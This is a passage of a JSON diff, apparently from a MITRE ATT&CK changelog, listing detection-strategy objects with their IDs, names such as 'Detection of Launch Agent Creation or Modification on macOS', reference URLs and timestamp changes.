+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5b64c4fd-981e-4f34-97a4-9cd22d6f40e4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0807",
+                            "external_id": "DET0807"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Identify Roles",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a9a66c41-1b05-41fc-a866-272848b051ff"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ad99833c-d2de-45be-a20b-9cbb6d797a35",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0840",
+                            "external_id": "DET0840"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Install Digital Certificate",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a05f564d-365c-46ce-ab98-ba377aa3b660"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--00a4e92b-8164-4342-a71c-013ecc777ad0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0377",
+                            "external_id": "DET0377"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Kernel/User-Level Rootkit Behavior Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--03f2259d-45c2-4422-83ad-58955f89350c",
+                        "x-mitre-analytic--62cf396f-01d6-4ab0-a3f5-bf75d90c2c40",
+                        "x-mitre-analytic--0248d3dc-266e-45c3-89e4-4865f9174cfd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c29886a9-676a-441a-adcd-6f239f8eb6b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0437",
+                            "external_id": "DET0437"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of LSA Secrets Dumping via Registry and Memory Extraction",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a29288f5-c5d8-4e2d-8370-c4e21a64fc95"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4dbd7441-627f-4d5a-a060-28fe6a8cbb9e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0434",
+                            "external_id": "DET0434"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Launch Agent Creation or Modification on macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--441bfb28-3fe5-410b-93a5-2280a7f19dad"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cfdf2a13-7059-4532-9d1c-f9129b0e3f7b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0041",
+                            "external_id": "DET0041"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Lifecycle Policy Modifications for Triggered Deletion in IaaS Cloud Storage",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f6f90ad5-3182-4b1a-a612-51b251a8a34c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--020447ec-f030-4b95-a187-255177b69d9f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0893",
+                            "external_id": "DET0893"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Link Target",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--91f5dbce-d334-4b42-9554-e94866d75a26"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b045b89e-3095-41c3-a04d-d40075f14cd8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0407",
+                            "external_id": "DET0407"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Local Account Abuse for Initial Access and Persistence",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9c53e92a-3659-4137-881a-f4002af9c688",
+                        "x-mitre-analytic--269f36b6-77fa-4959-9e63-e30036c991d7",
+                        "x-mitre-analytic--d6288db6-ff55-4720-b0ee-7aca3e65cc72"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3e5e2bda-40c0-4aea-90f1-8fc52096ad5e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0013",
+                            "external_id": "DET0013"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Local Browser Artifact Access for Reconnaissance",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c233a50c-0fdb-412b-85f6-8ff71a3539b9",
+                        "x-mitre-analytic--4a5abd9c-b4f3-4c29-9406-82aa3401c049",
+                        "x-mitre-analytic--353e902d-b33c-466b-9276-5f224a259934"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--36bb5edf-e7b6-4d36-8ccc-1a18ddc573da",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0380",
+                            "external_id": "DET0380"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Local Data Collection Prior to Exfiltration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--79ecfad5-3439-4a04-919a-236d47652ba0",
+                        "x-mitre-analytic--4f5f64b3-bc1b-4573-b790-42b8adfdd609",
+                        "x-mitre-analytic--a48f36c7-e946-4270-ae23-1a2e52ae2e24",
+                        "x-mitre-analytic--dfe1b67a-a1c1-43f4-a043-5784a315d018",
+                        "x-mitre-analytic--0abb4122-0795-46ef-b162-7570db42596a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e91165c5-e850-465e-9042-6ba82478b522",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0261",
+                            "external_id": "DET0261"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Local Data Staging Prior to Exfiltration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--561fb700-686a-4583-96a9-77a55358d357",
+                        "x-mitre-analytic--c5e7b8a9-72f6-40db-be4a-ec17386d884f",
+                        "x-mitre-analytic--01a3cc24-df78-4ff7-8a25-67545d830229",
+                        "x-mitre-analytic--27caeb90-1cf0-4650-a3f3-c8a1edaecbab"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bcb3772f-25d7-4e41-8e37-ec0dc759f44d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0135",
+                            "external_id": "DET0135"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Mail Protocol-Based C2 Activity (SMTP, IMAP, POP3)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--aef3d563-19f5-4d52-b7ad-4c4abadcb568",
+                        "x-mitre-analytic--a311af7c-2302-4113-8cc3-d5d599fa908a",
+                        "x-mitre-analytic--43347e24-50d6-446e-923d-a6fd69805a22",
+                        "x-mitre-analytic--784b7a50-cdc5-4161-8b52-2be5e5de19ac"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7f7679d8-c2eb-4fcc-be46-27055ef491a6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0138",
+                            "external_id": "DET0138"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Malicious Code Execution via InstallUtil.exe",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f3478623-5b5c-482e-96f1-6b225ff8fa70"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--012e526a-dacd-4019-a019-bc68733395d2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0194",
+                            "external_id": "DET0194"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Malicious Control Panel Item Execution via control.exe or Rundll32",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8581bca4-9d34-4c78-87f7-29244581d140"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a1e17bbb-73d6-48d5-b0ab-1350189b0ecd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0206",
+                            "external_id": "DET0206"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Malicious Kubernetes CronJob Scheduling",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f2c03ef0-cd36-42b8-9c2d-e25a3b1b8b1c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c254ecff-c728-4de8-a0f8-e5ad5015aa32",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0328",
+                            "external_id": "DET0328"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Malicious Profile Installation via CMSTP.exe",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ae250934-772b-43a5-9a29-9cbd92972858"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--eaa0f0da-bee7-4ce3-97e5-46d5ac2a9257",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0092",
+                            "external_id": "DET0092"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Malicious or Unauthorized Software Extensions",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ce76c289-b810-44cf-b71e-afc76a70f7bf",
+                        "x-mitre-analytic--d8f9ab20-4c82-42fc-9316-91781fa9e5e1",
+                        "x-mitre-analytic--560f859b-2174-4655-b927-b274ad0bda3f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
